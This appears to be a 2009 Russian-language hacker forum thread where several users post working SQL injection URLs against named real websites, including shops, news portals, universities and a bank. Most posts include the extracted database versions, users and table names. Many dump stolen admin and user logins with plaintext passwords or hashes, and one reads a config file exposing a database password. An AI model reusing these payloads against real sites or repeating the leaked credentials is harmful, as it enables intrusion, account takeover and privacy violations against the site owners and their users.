Просмотр полной версии : SQL Инъекции
http://www.itscoldoutside.com/
http://www.itscoldoutside.com/news.asp?id=1+or+1=(select+top+1+id+from+dtpropert ies)--
version: Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name: ICONews
system_user: Clive
вот что удалось раскрутить:
table_name column_name
VW_test
dtproperties 'id' 'objectid' 'property' 'value' 'uvalue' 'lvalue' 'version'
NewsArticles
sysconstraints 'constid' 'id' 'colid' 'spare1' 'status' 'actions' 'error'
syssegments 'segment' 'name' 'status'
t_jiaozhu 'jiaozhu'
tbl_news
vw_bcpMasterSysobjects 'tag' 'parent' 'Article!1!ID' 'Article!1!BradftonID' 'Article!1! Heading' 'Article!1! DateFeed'
vw_googlenews
VW_rss
VW_top
VW_xml
p.s. первый раз :rolleyes:
BlackPanther
25.04.2009, 15:20
Site: (sibmedia.ru) Новостной портал.
SQL:
http://sibmedia.ru/index.php?id=-10220+union+select+CONCAT_WS(CHAR(32,58,32%20%20), user(),database(),%20version()),null,2--
Рузелтат смотреть вверху.
Таблицы :
CHARACTER_SETS
COLLATION
COLLATION_CHARACTER_SET_APPLOCABILITY
COLUMNS
COLUMS_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
CHEMATA
CHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
all_news
areas
static
vote
mailbrush
25.04.2009, 15:59
http://www.ckat.ru/keywords/answer.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())/*Uwww63S@localhost:udb63:4.1.21-loghttp://www.venereology.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9mgido@localhost:mgido:5.0. 45http://www.infomedical.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9infomedical@localhost:info medical:5.0.45
M.W.N.N.
25.04.2009, 19:47
http://www.beadstreet.com.au/listproducts.php?id=47+union+select+concat_ws(0x3a ,version(),database(),user())+limit+1,1
version():4.1.20
database():beadstreet
user():beadstre@localhost
__
http://www.bpsca.co.uk/products.php?id=147+union+select+1,concat_ws(0x3a, version(),database(),user()),3,4,5,6,7,8,9,10,11+l imit+1,1/*
version():4.1.22-standard:
database():bpsca_data
user():bpsca_website@localhost
__
http://www.etver.ru/1forum/viewmessage.php?sid=1&id=29140+union+select+1,2,3,concat_ws(0x3a,version (),database(),user()),5,6,7,8,9
version():5.0.77-log
database():etver
user():etver@localhost
DezMond™
26.04.2009, 12:21
http://vikings.vcsu.edu/php/details.php?id=-563'+union+select+1,2,table_name,4,table_name,6,7, 8,9,10,11,12,13,14,15+from+information_schema.tabl es+limit+879,1000+--+
Все таблицы заблокированны((
cinema.perm.ru
http://cinema.perm.ru/events/?id=-67+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6--
version():4.0.24_Debian-10sarge2-log
database():dbcinema
user():cinema@localhost
<<RUNAWAYBOX>>
http://www.runawaybox.com/video.php?vid=-396+union+select+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9--+
http://www.runawaybox.com/admin/
5.0.45:runawaybox:runawaybox@localhost:portbld-freebsd6.2
-=admin=-
log: runawaybox
pass: $1$0lRFi.9p$5vaDEIDcwC/b/aQu/H1.g1 ):
online game
http://info.wotgame.ru
thx for Saint
mssql-inj поле логина,результат в урл
Таблы:
wqe' or 1=(select top 1 TABLE_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME NOT IN('UserRecords','Objects','InheritanceMapping','U serRecordParts','CharacterRecordParts','TypesMappi ng','CharacterRecords','UserRecordsToUserRecordPar ts','UserRecordsToCharacterRecords','CharacterReco rdsToCharacterRecordParts','JabberUserRecords','WO TCharacterRecordStubs'))--
================================================== ==================================
http://www.585.ru/index.php?main=11&sess=12103026&model=3446+and+substring(@@version,1,1)=4
version():4 ;(
================================================== ==================================
http://eromagazin.ru/info/?id=-6300+union+select+1,2,3,4,5,6,7,8,9,table_name,11, 12,13+from+information_schema.tables--
concat_ws(0x3a,version(),user(),database()):5.0.67-log:u30200@10.10.153.166:u30200
DezMond™
26.04.2009, 16:31
http://www.jc.edu/calendar/details.php?id=-4265+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11 +from+information_schema.tables/*
http://www.raznosvet.com/do/notice.php?id=-7590+union+select+concat_ws(0x3a,version(),databas e(),user()),2,3,4,5,6,7,8,9,10--
version: 4.0.27-max-log
database: razno
user: razno@208.109.138.83
еще похекал сайт тур фирмы(mssql), пока выкладывать не буду :)
www.petpsych.com
http://www.petpsych.com/article_detail.php?id=-1+union+select+1,2,3,4,5,6--
version():5.0.67-community
database():petpsych_main
user():petpsych_petpsyc@localhost
<<msong.com.ru>>
http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name, table_schema),3,4,5,6,7,8,9+from+information_schem a.tables--+
5.0.22:::admin_song1:::admin_song1@localhost:::red hat-linux-gnu - 3
tables where columns: password
http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name, table_schema),3,4,5,6,7,8,9+from+information_schem a.columns+where+column_name+like+'password'+limit+ 3,1--+
AngelOfFaith
26.04.2009, 20:38
http://wap.jamango.ru/mangotop/index.php?action=top100&cat=-4+union+select+1,2,3,4,concat_ws(0x3a,url,email,pa ssword)+from+top_users/*
HAXTA4OK
26.04.2009, 23:13
продолжим ломать вапики ;)
http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(version (),0x3a, user(),0x3a,database())/*
5.0.45-community-nt:likenetru@localhost:likenet
акк брать из таблицы users
http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(login,0 x3a,password,0x3a,email)+from+ users/*
M.W.N.N.
27.04.2009, 01:28
http://www.zbulvar.ru/wap/newz.php?newsid=21498+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():zbulvar_pm
user():zbulvar_pm@localhost
http://www.roymagazine.it/time/display.php?ID=179/**/UNION/**/SELECT/**/password,userid+from+user/*
Database name: Sql33637_1
User name: Sql33637@62.149.130.154
Database Version: 4.0.30-standard-log
http://www.envapack.com/b2b/buyoffers.php?cid=-3+union+select+1,table_name,3,4,5,6,7,8+from+infor mation_schema.tables+limit+70,1#
5.0.67-community
envapack_b2b
envapack_root@localhost
таблы
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
b2b_admin
b2b_ads
b2b_affiliate_banner
b2b_banned_words
b2b_blocked
b2b_blocked_countries
b2b_businesstypes
b2b_categories
b2b_companyprofiles
b2b_config
b2b_contacts
b2b_country
b2b_currencies
b2b_dateformats
b2b_employees
b2b_fav_cats
b2b_favorites
b2b_feedback
b2b_groups
b2b_icons
b2b_levels
b2b_mails
b2b_markets
b2b_members
b2b_messages
b2b_news
b2b_newsletter
b2b_offer_cats
b2b_offer_cats_buy
b2b_offer_images
b2b_offers
b2b_offers_buy
b2b_online
b2b_product_cats
b2b_product_images
b2b_productfocus
b2b_products
b2b_profile_cats
b2b_profile_markets
b2b_search_results
b2b_signups
b2b_stats
b2b_styles
b2b_timeformats
b2b_tmp_email
b2b_us_states
admin
class
config_file
cours
cours_user
course_tool
crs_ACTIPACK_accueil
crs_ACTIPACK_announcement
winstrool
27.04.2009, 13:39
_http://egenius.ru/seminar/arc.php?cid=-4+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9+--
версия:юзер:база
5.0.67-log:u96975@10.10.153.177:u96975_eg
HAXTA4OK
27.04.2009, 13:47
<<дельфинчкигги>>
http://www.ptpi-dolphins.org/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7--
plbginf_ptpi@localhost:plbginf_ptpi:5.0.67-community
M.W.N.N.
27.04.2009, 14:46
http://wap.novonews.lv/index.php?mode=news&id=72419%27+union+select+1,2,3,4,5,6,7,8,9,10,conc at_ws(0x3a,version(),database(),user()),12,13,14,1 5+limit+1,1/*
version():5.0.22-log
database():novonews_v2
user():novonews_v2_adm@192.168.1.1
HAXTA4OK
27.04.2009, 14:57
опять вапики http://wap.geoline.ge/wap1.php?pg=gmlist&id=-358+union+select+concat_ws(0x3a,version(),database (),user()), 2
5.0.33-log:mobicont:webserver@localhost
winstrool
27.04.2009, 15:30
_http://www.sportshop.com.ua/catalogue.php?CID=-27+union+select+1,2,3,concat_ws(version(),user(),d atabase()),5,6,7,8--
version():4.1.22-standard
database():babymark_im
user():babymark_akhar@localhost
www.vetlek.ru
http://www.vetlek.ru/articles/?id=-1+union+select+1,2,3,concat(0x3a,version(),databas e(),user()),5,6,7,8--
version():5.0.67-log
database():u66995
user():u66995@10.10.10.218
HAXTA4OK
27.04.2009, 15:54
софтянки какие то
softobzor.com.ua
ТИЦ: 30
PR: 3
http://softobzor.com.ua/stat_info.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),us er()),3,4/*
version():4.1.25
database():softobzor
user():softobzor_user@localhost
HAXTA4OK
27.04.2009, 16:14
ой слоник какой то
http://loznitsa.ru/object.php?id=-1+union+sel ect+concat_ws(0x3a,version(),database(),user())--
ТИЦ: 10
PR: 1
5.0.30-Debian_1-log:loznitsa_baze:loznitsa_baze@77.221.130.2
mailbrush
27.04.2009, 16:37
http://www.othmar-karas.at/ok.php?ok=new_presse_zeigen.php&id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user() ,database(),version()))),4,5,6,7,8,9web1@localhost :web1:4.1.13
DezMond™
27.04.2009, 16:46
Пр5
http://events.plu.edu/events.php?mode=&date=&subject=-65+union+select+LOAD_FILE(0x2F7777772F6576656E7473 2F696E636C756465732F636F6E6669672E706870),2,versio n()+from+mysql.user/*
/*define("MYSQL_SERVER", "localhost");
define("MYSQL_USERNAME", "webdev");
define("MYSQL_PASSWORD", "taiWORC48");*/
define("MYSQL_DB", "events_calendar");
кто расковыряет дальше, стукните в ПМ (хотя, там походу, вход в админку по ай пи разрешёт)
<<Клуб"Шатура"- Официальный сайт>>
http://www.schkura.ru/vid/index.php?download=-8+union+selecT+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),8,9,0,1--+
4.1.22-standard-log:schkura_mus:schkura@localhost:unknown-linux-gnu
HAXTA4OK
27.04.2009, 17:19
http://www.biker.dn.ua/notes/notes_view.php?id=-1+union+select+1,2,3,4, version()/*
ТИЦ: 20
PR: 3
version():4.0.21-log
database():biker_dn_u
user():biker_dn_u
blind sql-inj
http://mqup.mcgill.ca/content.php?id=4+and+substring(@@version,1,1)=5
http://www.sttheresasugarland.org/content.php?id=13+and+substring(@@version,1,1)=5
http://www.ufs.ac.za/faculties/content.php?id=6355+and+substring(@@version,1,1)=5
http://www.nigfilmcorp.com/content.php?id=-7+union+select+1,2,concat_ws(0x3a3a,version(),data base(),user()),4,5--
4.1.22-max-log::nfcadmin::nfcadmin@64.202.163.150
http://www.rupedia.ru/showarticle.php?article=-12607+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a, version(),database(),user()),10,11,12/*
version: 4.1.22-log
database: wwwrupediaru_articles
user: webmas02_artic01@fe46.hc.ru
HAXTA4OK
27.04.2009, 18:32
не знаю интересно или нет но там что то с деньгами))
ТИЦ: 10
PR: 3
http://komu.com.ua/index.php?Lev=b3&Id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database() ,user())+--+
5.0.77:komu_com_ua:komu.com.ua@localhost
http://komu.com.ua/index.php?Lev=b3&Id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,pas s,email)+from+users +--+
admin
95a9ac6:admin@komu.com.ua
всего 6275 акк
www.gmsn.ru
http://www.gmsn.ru/pic.php?id=-710%27+union+select+1,2,3,4,5/*
Database Version: 4.1.16-1.gms
Database name: w_gmsn
User name: w_gmsn@195.42.160.19
1600 ТиЦ
M.W.N.N.
27.04.2009, 19:19
http://www.viva-telecom.ru/SHOP/fullimage.php?id=2691&idfull=1955%27+union+select+1,concat_ws(0x3a,versi on(),database(),user()),3,4,5+limit+1,1/*
version():5.0.45
database():wwwvivatelecomru
user():vivatele@localhost
HAXTA4OK
27.04.2009, 19:42
http://www.flatsminsk.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,version(),database(),user()), 13--
5.0.67-community-log:flats_main:flats_main@localhost
ТИЦ: 60
PR: 3
mailbrush
27.04.2009, 20:01
http://www.coolhandfish.com/fish.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20dbo166573204@74.208.16.166:db166573204:4.0. 27-stan
DezMond™
27.04.2009, 20:11
Куча шопов))
http://www.expo-shop.ru/show_cat.php?grid=1&catid=2'+union+select+1,2,3,concat(password),5,6,7 ,8,9,10+from+admin/*
admin:4e5306301f075d39
http://www.sanmag.ru/show_cat2.php?grid=10'+union+select+1,2,3,4,5,6,7, 8/*
http://elitmatras.ru/show_cat.php?catid=212'+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19/*&grid=1
http://office-r.ru/show_cat.php?catid=92'+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17/*&grid=22
http://svet-svetoch.ru/show_cat3.php?catid=59&grid=7&idcateg=141'+union+select+1,2,3,4,5,6,7,8,9,10,11, 12/*
http://www.inetstyle.ru/show_cat2.php?grid=2'+union+select+1,2,3,concat(us ername,char(58),password),5,6,7,8,9,10+from+admin/*&catid=1&cen=&order=name&page=1
admin:telegrad
http://www.imperia-sna.ru/show_cat2.php?grid=702'+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18/*--
http://planetasnov.ru/show_cat.php?catid=5038'+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18/*&grid=5037
http://wedmarket.ru/show_cat2.php?grid=70000'++union+select+1,2,3,vers ion(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+admi n/*
http://www.interiorportal.ru/show_cat2.php?grid=-16000000'+union+select+1,2,3,concat(username,char( 28),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23+from+admin+--+
admin:lelybr2009
http://www.elektro-inst.ru/show_cat2.php?grid=500018'+union+select+1,2,3,vers ion(),5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.deja-interier.ru/show_cat.php?catid=5115'+union+select+1,2,3,versio n(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&grid=5113
http://latomir.ru/show_cat2.php?grid=1001'+union+select+1,2,3,versio n(),5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.zerogravity.ru/show_cat2.php?grid=1029000'++union+select+1,2,3,ve rsion(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://gallerysilk.ru/show_cat2.php?grid=1000'+union+select+1,2,3,versio n(),5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin/*
http://superteks.ru/show_cat2.php?order=name&grid=20000'+order+by+19/*
http://www.1000sumok.ru/show_cat2.php?grid=5058'+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17/*
http://www.portlandtx.com/news_archives.cfm?Id=-208+union+select+1,2,3,4,concat_ws(0x3a3a,username ,password),6,7,8+from+users/*
admin::F6DD58073ACB9111CD679C6597CFA024
chief::6898E710591B1A087C116199C9FA133F
sclarkson::81DD00DC9116352D6709E292C464B49A
arodriguez::AEDE954108421A586EE11C78A82B9366
apardo::2A218023E4AD3A32BBBA046271FB730E
pwright::7AD0F14CF900538267C457BD0B353B3B
abrooks::112D0BB629485166AC216C96C9B39909
bstewart::8DBC2828A56856FC152437BD551628B5
webmaster::8322E314ADDA52C357DCCF5E7E00F882
publicworks::DB4C4FD9662222E31F106CBA6809C1CE
melanie::DB70B2AC0544B912AAA8B93C37E24A38
ccdastrophotography.com pr 4
http://ccdastrophotography.com/object.php?id=-13%20union%20select%201,2,3,concat_ws(0x3a3a,datab ase(),user(),version()),5,6,7,8,9,0,1,2,3
ccd::ccd@localhost::5.0.51a-3ubuntu5.4
HAXTA4OK
27.04.2009, 20:45
http://www.elfarus.ru/index.php?action=pages&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()), 4--
5.0.77:elfarus_el:elfarus_el@localhost
ТИЦ: 30
PR: 4
http://www.helsinki.ua/project.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(), user())/*
5.0.44-log:helsinki_helsinki:alefvinal@localhost
ТИЦ: 10
PR: 3
mailbrush
27.04.2009, 21:05
http://www.4thirds.co.uk/fish.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13+--+reesy_reesy77@localhost:reesy_gallery:4.1.22-standard
http://www.mercerbar.com/philanthropy.php?pid=2+UNION+SELECT+concat_ws(0x3a ,user(),version(),database())+LIMIT+1,1/*
mercer_mercerbar@localhost:4.1.22-log:mercer_mercerbar_db
ILYAtirtir
28.04.2009, 01:48
СравниСам.ру - первый в Рунете супермаркет услуг.
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,database(),user(),version()),14,15
base_general:saddamhoosaine@localhost:5.1.32-log
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,t able_name,14,15+from+information_schema.tables+lim it+x,1
мне понравились
sms_admin_users
ss_users
tbl_admin_users
tbl_users
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c olumn_name,14,15+from+information_schema.columns+w here+table_name=0x736D735F61646D696E5F7573657273+l imit+x,1
login
password
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,login,password),14,15+from+sms_admin _users+limit+x,1
dima:rjyntynrjyntyn
maria:ghjcnjvfhbz
andrey:727272
malcev:ghbdtn123
investrastbank:12345678
sofrino:vTHj6uRc
investsouz:12345678
sovinkom:1509710
kipbank:12345678
mezhtrastbank:12345678
ИТД
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c olumn_name,14,15+from+information_schema.columns+w here+table_name=0x73735F7573657273+limit+x,1
users_login
users_password
users_nick
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,users_login,users_nick,users_passwor d),14,15+from+ss_users+limit+x,1
Maria:Maria:191700
riddi:riddi:edjkty
Brat::Brat
marina::17091987
sergey::ghjcnjhflbj
olga::031083
serg::123
len:len:123
slon::123
diva::191369
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c olumn_name,14,15+from+information_schema.columns+w here+table_name=0x74626C5F61646D696E5F7573657273+l imit+x,1
login
password
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,login,password),14,15+from+tbl_admin _users+limit+x,1
linx:727272
Dima:rjyntynrjyntyn
olga:lj,hjgj;fkjdfnm123
roshina:yflt;lf
andrey:727272
marina:ghjcnjvfhbyf
maria:ghjcnjvfhbz
ilya:ghjcnjbkmz
malcev:ghbdtn123
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c olumn_name,14,15+from+information_schema.columns+w here+table_name=0x74626C5F7573657273+limit+x,1
user
pass
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,user,pass),14,15+from+tbl_users+limi t+x,1
linx:727272
Dima:rjyntynrjyntyn
mariya:ofprfrdjqle
andrey:3295998
magir:ghjcnjvfubh
olga:031083
sveta:z[jxehf,jnfnm
roshina:yflt;lf
marina:ghjcnjvfhbyf
ilya:ghjcnjbkmz
malcev:ghbdtn123
winstrool
28.04.2009, 13:14
вот ещё парочка скулей))
_http://friendsoftheirishenvironment.net/friendswork/index.php?action=cat&cid=-7+union+select+1,2,3,4,concat_ws(0x3b,version(),us er(),database()),6,7,8,9+--
версия/юзер/база
4.1.22-standard;fienet_fie@localhost;fienet_fie
_http://www.poseidon.hcmr.gr/article_view.php?id=-124+union+select+1,2,3,4,5,6,9,8,concat_ws(0x3b,ve rsion(),user(),database()),0,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,42,41,43,44,45,46,47,48,49,50,5 2,53,52,54+--&cid=28&bc=28
версия/юзер/база
5.0.45;www_poseidon@iris5004.ath.hcmr.gr;project_p oseidon
_http://bclibrary.ca/ell/links.php?subid=-191+union+select+1,2,3,4,concat_ws(0x3b,version(), user(),database()),6,7,8+--&cid=4'=
версия/юзер/база
5.0.24-plsb-log;ell_web@localhost;ell
_http://www.tneb.in/template_3.php?tempno=3&cid=0&subcid=-181+union+select+concat_ws(0x3b,version(),user(),d atabase())+--
версия/юзер/база
5.0.41-log;tnebin@localhost;tnebin_eb
_http://russian-invest.ru/index.php?do=catop&cid=-69+union+select+1,2,3,4,concat_ws(0x3b,version(),u ser(),database())
версия/юзер/база
5.0.32-Debian_7etch6-log;russia@localhost;russia_fin
mailbrush
28.04.2009, 14:44
http://zwerg-schnauzer.info/dog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,user(),database(),version()),16,17,18 rustrake_mini@localhost:rustrake_mini:5.0.26-lk-loghttp://sarilocker.com/advice/qa.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6sarilock_01@localhost:sarilock_0 1:5.0.75-community-loghttp://armor.kiev.ua/php/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9armor@localhost:armor:5.0. 77
.:[melkiy]:.
28.04.2009, 20:39
Cборник музыкальных сайтов
http://catmusic.org/info/?id=-1230+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
Database Version: 4.1.20
Database name: infor490_5
User name: infor490_5@localhost
Жаль БД 4 :(
http://www.fcmetalurg.com/season/about_team.php?tid=-5+union+select+version(),2,3,4/*
www.directionsmedia.net
http://www.directionsmedia.net/newsletters.archive/index.php?ID=-142+union+select+1,2,3,4--
version()4.1.22-log
database()DirMain
user()sa@localhost
blind sql-inj
http://www.endven.com/index/news.php?id=20+and+substring(@@version,1,1)=5
http://www.ogf.org/News/news.php?id=129+and+substring(@@version,1,1)=4
----------------------------------------------
AkyHa_MaTaTa
28.04.2009, 22:16
www.gmsn.ru - ТиЦ 1200 Pr - 6
http://www.gmsn.ru/page.php?rub=news&id=-1'+union+select+1,2,unhex(hex(concat_ws(0x3A,user( ),@@version,database()))),4,5,6,7,8--+
w_gmsn@195.42.160.19:4.1.16-1.gms:w_gmsn
ph1l1ster
28.04.2009, 22:53
filetransit.com
ТИЦ: 90
PR: 6
http://www.filetransit.com/category.php?id=192+AND+ascii(lower(substring((SEL ECT+concat(name,0x3a,password)+from+user+LIMIT+1), 1,1)))>1
ascii:32,97,108,101,120,58,116,114,97,110,53,33,11 6
char: alex:tran5!t
http://www.filetransit.com/admin/
HAXTA4OK
28.04.2009, 23:35
ресторан-диван))
http://www.restoran-divan.ru/menu.php?id=-1+union+select+concat_ws(0x3a,version(),database() , user())--
4.1.22-log:www7masterovru_divan:x7mastero_divan@fe35.hc.r u
ТИЦ: 100
PR: 0
http://www.r-divers.ru/yacht.php?id=-1'+union+select+1,concat_ws(0x3a,version(),databas e(), user()),3,4/*
4.1.22:rdivers_rdivers:rdivers_rdivers@localhost
ТИЦ: 0
PR: 3
ILYAtirtir
29.04.2009, 08:59
MKBUnionBank
http://www.unionbank.bg/index.php?p=services2_4_3'+and+substring(version() ,1,1)=5/*&language=bg
5ая ветка
user() = root
database() = unionbank
Закрытое акционерное общество РОССПЕЦСТАЛЬ
http://www.rosspecstall.ru/index.php?page=products&tid=-100009+union+select+1,concat_ws(0x3a,database(),us er(),version())
rosspecstall:rosspecstall@berns.mplik.ru:5.0.41-log
http://www.rosspecstall.ru/index.php?page=products&tid=-100009+union+select+1,concat_ws(0x3a,login,passwor d)+from+stal_admin
admin:5f4dcc3b5aa765d61d8327deb882cf99
админка: http://www.rosspecstall.ru/admin.php
winstrool
29.04.2009, 09:39
ТИЦ 180
PR 0
_http://www.stebenev.com/index.php?cid=2+union+select+concat_ws(0x3b,versio n(),user(),database()),2,3,4,5,6,7,8,9,0,1,2,3,4,5 +--
версия/юзер/база
5.0.67;u13249@78.108.81.11;b13249
http://stebenev.com/admin/
admin;2ee8f38b6616f2ad28cf84f19e8f9ffa
Вот что выдала таблица по запросу
_http://www.stebenev.com/index.php?cid=2+union+select+table_name,2,3,4,5,6, 7,8,9,0,1,2,3,4,5+from+information_schema.tables--
cms_access
cms_banners
cms_catalog_attributes
cms_catalog_categories
cms_catalog_category
cms_catalog_gallery
cms_catalog_okrug
cms_catalog_prod
cms_catalog_products
cms_catalog_values
cms_config
cms_counters
cms_frontpage
cms_gallery_albums
cms_gallery_images
cms_group
cms_guestbook
cms_links
cms_modules
cms_news
cms_news2
cms_pages
cms_pages
cms_shoper
cms_shoping_cart
cms_templates
cms_types
cms_users
cns_adminsessions
cns_advert_pages
cns_advert_referers
cns_config
cns_counter
cns_counter_total
cns_data
cns_exclude
cns_filters
cns_goodies
cns_languages
cns_log
cns_size
cns_subnets
cns_today
cns_who_cache
eng_access
eng_banners
eng_catalog_attributes
eng_catalog_categories
eng_catalog_category
eng_catalog_gallery
eng_catalog_okrug
eng_catalog_prod
eng_catalog_products
eng_catalog_values
eng_config
eng_counters
eng_frontpage
eng_gallery_albums
eng_gallery_images
eng_group
eng_guestbook
eng_links
eng_modules
eng_news
eng_news2
eng_pages
eng_shoper
eng_shoping_cart
eng_templates
eng_types
eng_users
HAXTA4OK
29.04.2009, 14:38
http://www.roxter.com.ua/publication.php?id=-1+union+select+1,2,concat_ws(0x3b,version(),user() , database()),4,5,6--
5.0.51a-log;bzbunsky@localhost;roxter
ТИЦ: 10
PR: 4
http://www.natec-color.ru/prod.php?id=-1+union+select+1,2,concat_ws(0x3b,version(),user() , database()),4,5,6--
5.0.67-log;u7799@10.10.223.235;u7799_2
ТИЦ: 30
PR: 0
http://www.meridian.kr.ua/country.php?id=-1+union+select+1,concat_ws(0x3a,version(), user(),database()),3,4,5,6--
4.1.22-log:meridian_admin@goliaph:meridian_mybase
ТИЦ: 10
PR: 1
http://www.apstyle.ru/articles/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6--
4.0.24:apstyle@localhost:apstyle
ТИЦ: 20
PR: 3
winstrool
29.04.2009, 16:01
_http://commercials.tuneforums.com/thread_view.php?threadID=-4037+union+select+1,2,3,4,concat_ws(0x3b,version() ,user(),database()),6,7,8,9,0,1,2
версия/юзер/база
4.0.27-max-log;dbo112672968@74.208.16.34;db112672968
http://commercials.tuneforums.com/login.php
emilengelman@hotmail.com;MARIE532
HAXTA4OK
29.04.2009, 16:26
http://www.lacart.ru/collectionsall.php?id=-1+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4,5--
4.0.26:lacart@box.hc.ru:wwwlacartru
ТИЦ: 30
PR: 4
<<ПОРТАТИВНЫЙ МИР>>
http://www.portmir.ru/info.php?id=-1420259+union+select+concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--+
4.1.22-log:wwwportmirru2:portmir@localhost:portbld-freebsd6.2
http://www.portmir.ru/adm/
Target: www.sundance.dk
Evil link: http://www.sundance.dk/news.php?id=-40'+union+select+1,2,3,concat_ws(0x203a20,version( ),database(),user(),@@version_compile_os)--+
Info:
Database Version: 5.0.51a-24-log
Database name: sundance
User name: sundance@84-246-245-157.unalloc.logiqit.net
OS: debian-linux-gnu
Users:
sundance:46157170e33a0ca09fc15487fdab0a52602235ca1 70c
caroline:9da0b07318fcab9d6a233ec421410823dca70bbf4 dda
caroline1:0b4f5a88e8a65fe96b873f6ae9b5a9292115fbad 0bf5
123:30bc40bd001563085fc35165329ea1ff5c5ecbdbbeef
HAXTA4OK
29.04.2009, 23:28
http://www.stfootball.com/club/club_list.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32--
5.0.76-standard-log:planetfootball@localhost:stfoot_belarus
-m0rgan-
29.04.2009, 23:37
http://www.kulturkoppra.se/istid/page.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(0x3a,id,pas swd)+from+passwd--
id/password:
1:4IdIn367
ILYAtirtir
30.04.2009, 05:17
ОАО "Транстелеком"
